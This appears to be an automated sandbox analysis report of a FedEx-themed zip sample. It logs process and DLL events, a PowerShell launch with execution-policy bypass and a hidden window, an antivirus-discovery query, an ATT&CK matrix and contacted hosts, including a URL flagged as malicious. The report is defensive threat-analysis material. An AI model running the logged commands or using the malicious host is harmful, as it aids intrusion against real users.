    Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: VertusinstruccionesFedEX_66521.zipStatic file information: File size 2925285 > 1048576
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9315Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 583Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep count: 9315 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep count: 583 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\OpenWith.exe TID: 1824Thread sleep count: 58 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: OpenWith.exe, 00000016.00000002.2189681249.0000020EBF0A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: amsi64_5056.amsi.csv, type: OTHER
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %PCzmjQH8jota% "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\-Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Temp1_VertusinstruccionesFedEX_66521.zip\- VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Standard Port
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Rundll32
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture2
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    System Network Configuration Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542320 Sample: VertusinstruccionesFedEX_66... Startdate: 25/10/2024 Architecture: WINDOWS Score: 60 27 ipinfo.io 2->27 33 Suricata IDS alerts for network traffic 2->33 35 Yara detected Powershell download and execute 2->35 37 Sigma detected: Suspicious PowerShell Parameter Substring 2->37 8 cmd.exe 1 2->8         started        10 OpenWith.exe 1 6 2->10         started        12 OpenWith.exe 18 6 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 cmd.exe 1 8->16         started        18 conhost.exe 8->18         started        20 cmd.exe 1 8->20         started        22 notepad.exe 5 10->22         started        process6 24 powershell.exe 14 10 16->24         started        dnsIp7 29 45.79.204.129, 49706, 49708, 80 LINODE-APLinodeLLCUS United States 24->29 31 ipinfo.io 34.117.59.81, 49707, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 24->31

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    ipinfo.io
    34.117.59.81
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://ipinfo.io/jsonfalse
        unknown
        http://45.79.204.129/contadores/TnZYN.php?iWY=EiwIZKlgmDJwbFobKM167awreInvomxL806TXsZdJznxUFOtrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://mozilla.org0notepad.exe, 00000017.00000003.2184133552.000001D937411000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000017.00000002.2457942413.000001D9374B2000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000017.00000002.2458476900.000001D9375B2000.00000004.00000020.00020000.00000000.sdmp, -false
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            34.117.59.81
            ipinfo.ioUnited States
            139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
            45.79.204.129
